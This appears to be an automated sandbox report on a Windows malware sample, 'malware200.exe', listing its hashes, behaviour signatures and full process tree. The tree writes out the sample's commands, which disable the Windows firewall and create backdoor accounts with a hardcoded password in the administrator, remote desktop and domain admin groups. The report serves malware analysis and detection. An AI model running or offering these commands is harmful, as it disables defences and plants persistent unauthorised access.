Overview

overview

10

Static

static

3

malware200.exe

windows7-x64

10

malware200.exe

windows10-2004-x64

9

Resubmissions

31-08-2023 12:31

230831-pp5gasef7w 9

31-08-2023 12:09

230831-pbznwsfa54 10

Analysis

  • max time kernel
    99s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230824-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230824-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-08-2023 12:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    malware200.exe

  • Size

    448KB

  • MD5

    957302c7e0c9e025397c2e3cfdc0fef3

  • SHA1

    10ac72a20ac5cd28c94199899fe2eae6ed5b3a84

  • SHA256

    ae1dab47fae0307831ec90b249d26ab4d783fd1fbfebf98a2448d40932885bbd

  • SHA512

    e1443c86e1acb84c5ecb80db5ecca931882478bfdc792c99875eef93b028ba169433dfa2fea8c7a6ee78a3792108172fb8d2e41103a76c77f8d67ee967948ebc

  • SSDEEP

    12288:oquErHF6xC9D6DmR1J98w4oknqOOCyQf1vYOUlsxd:prl6kD68JmlotQfhHUl4

Score
9/10
evasionpersistence

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 1 TTPs 3 IoCs
    evasion
  • Modifies WinLogon 2 TTPs 5 IoCs
    persistence
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p
    1⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4324
  • C:\Users\Admin\AppData\Local\Temp\malware200.exe
    "C:\Users\Admin\AppData\Local\Temp\malware200.exe"
    1⤵
    • Modifies WinLogon
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5096
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:264
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode Disable
        3⤵
        • Modifies Windows Firewall
        PID:1692
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4552
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:3192
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1596
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        PID:3200
    • C:\Windows\SysWOW64\net.exe
      net user AstNet h3lp12desk /expires:never /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
        3⤵
          PID:1276
      • C:\Windows\SysWOW64\net.exe
        net localgroup administrators AstNet /add
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3348
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup administrators AstNet /add
          3⤵
            PID:3404
        • C:\Windows\SysWOW64\net.exe
          net localgroup "remote desktop users" AstNet /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add
            3⤵
              PID:1352
          • C:\Windows\SysWOW64\net.exe
            net group "domain admins" AstNet /add
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4464
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 group "domain admins" AstNet /add
              3⤵
                PID:2308
            • C:\Windows\SysWOW64\net.exe
              net user AstNet /active:yes
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4636
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 user AstNet /active:yes
                3⤵
                  PID:3432
              • C:\Windows\SysWOW64\net.exe
                net user AstNet /expires:never
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3944
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 user AstNet /expires:never
                  3⤵
                    PID:4616
                • C:\Windows\SysWOW64\net.exe
                  net user AstNet h3lp12desk
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4996
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 user AstNet h3lp12desk
                    3⤵
                      PID:400
                  • C:\Windows\SysWOW64\net.exe
                    net user server_sys h3lp12desk /expires:never /add
                    2⤵
                      PID:892
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add
                        3⤵
                          PID:4216
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
                        2⤵
                          PID:2908
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false
                            3⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2664
                        • C:\Windows\SysWOW64\net.exe
                          net localgroup administrators server_sys /add
                          2⤵
                            PID:2444
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 localgroup administrators server_sys /add
                              3⤵
                                PID:2644
                            • C:\Windows\SysWOW64\net.exe
                              net localgroup "remote desktop users" server_sys /add
                              2⤵
                                PID:3840
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add
                                  3⤵
                                    PID:4316
                                • C:\Windows\SysWOW64\net.exe
                                  net group "domain admins" server_sys /add
                                  2⤵
                                    PID:2112
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 group "domain admins" server_sys /add
                                      3⤵
                                        PID:4752
                                    • C:\Windows\SysWOW64\net.exe
                                      net user server_sys /active:yes
                                      2⤵
                                        PID:2400
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 user server_sys /active:yes
                                          3⤵
                                            PID:4080
                                        • C:\Windows\SysWOW64\net.exe
                                          net user server_sys /expires:never
                                          2⤵
                                            PID:3372
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 user server_sys /expires:never
                                              3⤵
                                                PID:4816
                                            • C:\Windows\SysWOW64\net.exe
                                              net user server_sys h3lp12desk
                                              2⤵
                                                PID:4364
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 user server_sys h3lp12desk
                                                  3⤵
                                                    PID:4520
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"
                                                  2⤵
                                                    PID:2584
                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                      wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false
                                                      3⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3404
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:1284

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • memory/5096-0-0x0000000000BE0000-0x0000000000CEC000-memory.dmp

                                                    Filesize

                                                    1.0MB

                                                    Download

                                                  • memory/5096-11-0x0000000000BE0000-0x0000000000CEC000-memory.dmp

                                                    Filesize

                                                    1.0MB

                                                    Download

                                                  • memory/5096-12-0x0000000000BE0000-0x0000000000CEC000-memory.dmp

                                                    Filesize

                                                    1.0MB

                                                    Download

                                                  • memory/5096-13-0x0000000000BE0000-0x0000000000CEC000-memory.dmp

                                                    Filesize

                                                    1.0MB

                                                    Download